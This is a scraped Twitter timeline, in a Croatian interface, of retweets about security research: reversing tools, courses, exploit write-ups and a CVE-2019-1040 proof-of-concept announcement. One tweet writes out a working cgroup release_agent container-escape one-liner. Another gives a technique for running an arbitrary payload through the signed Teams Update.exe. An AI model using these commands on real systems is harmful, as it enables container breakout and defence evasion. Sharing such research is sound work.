Tweetovi

Blokirali ste korisnika/cu @0xabe_io

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xabe_io

  1. proslijedio/la je Tweet
    12. pro 2019.

    You can now install Miasm using "pip install miasm" ! See

    Poništi
  2. proslijedio/la je Tweet
    22. stu 2019.

    Just published my scripts to reconstruct Microsoft COM-Code. Tested on v7.4 and Python v2+3 => Happy reversing!

    Poništi
  3. 17. stu 2019.
    Poništi
  4. proslijedio/la je Tweet
    15. stu 2019.

    VERY excited to announce that we just opened up our first beta for registration in Brussels -

    Poništi
  5. proslijedio/la je Tweet
    5. lis 2019.

    If you need a fast/light way to instrument and save each instruction (with general purpose & r/e flags) in all levels of execution (User-mode/Kernel-mode/Hypervisor) then use my new customized version of QEMU.

    Poništi
  6. proslijedio/la je Tweet
    20. ruj 2019.

    Very excited about this course "SEC699" going to beta in December in the DC area. Seats will be capped and will go quickly when registration opens.

    Poništi
  7. proslijedio/la je Tweet
    14. ruj 2019.

    Good job! Short exploit modification allows inject unsigned dll to protected (SignatureLevel+MitigationFlags) Hyper-V guest OS process (vmwp.exe) in Windows Server 2019, when Secure Boot option is enabled for host OS.

    Poništi
  8. proslijedio/la je Tweet
    14. ruj 2019.

    Driver uses VT-x and EPT for intercepting address translation.

    Poništi
  9. proslijedio/la je Tweet
    10. ruj 2019.

    Horrible decision by Mozilla with grave repercussions for both security and privacy. The browser shouldn't be an OS and break the clearly defined layers. I've noticed the "Trusted" Recursive Resolver decision some time back.

    Poništi
  10. proslijedio/la je Tweet
    4. ruj 2019.

    humor with a message

    Poništi
  11. proslijedio/la je Tweet
    17. srp 2019.

    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p /w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo /c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    10. srp 2019.
    Poništi
  13. proslijedio/la je Tweet
    8. srp 2019.

    Bold prediction: so far, we have uncovered roughly 40% of the mess video conferencing is security-wise

    Poništi
  14. proslijedio/la je Tweet
    26. lip 2019.

    Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊

    Poništi
  15. proslijedio/la je Tweet
    17. lip 2019.

    Just discovered the plugin HyperPwn () by bet4it that provides a flexible TUI to . Good stuff!

    Poništi
  16. proslijedio/la je Tweet
    13. lip 2019.

    Short blog and POC code for CVE-2019-1040 (patched last Tuesday). Combining this vulnerability with the SpoolService bug and Kerberos delegation means: any AD user to Domain Admin; RCE on unpatched hosts; possible over Forest trusts. TL;DR: GO PATCH!

    Poništi
  17. proslijedio/la je Tweet
    12. lip 2019.

    Heap Overflow Exploitation on Windows 10 Explained (with info leak & code execution examples):

    Poništi
  18. proslijedio/la je Tweet
    10. lip 2019.
    Odgovor korisniku/ci
    Poništi
  19. proslijedio/la je Tweet
    29. svi 2019.

    Pro tip: you can now enable automatic security updates for known-vulnerable open source dependencies on your GitHub repos. Just go to the Security tab on your repo to turn it on.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·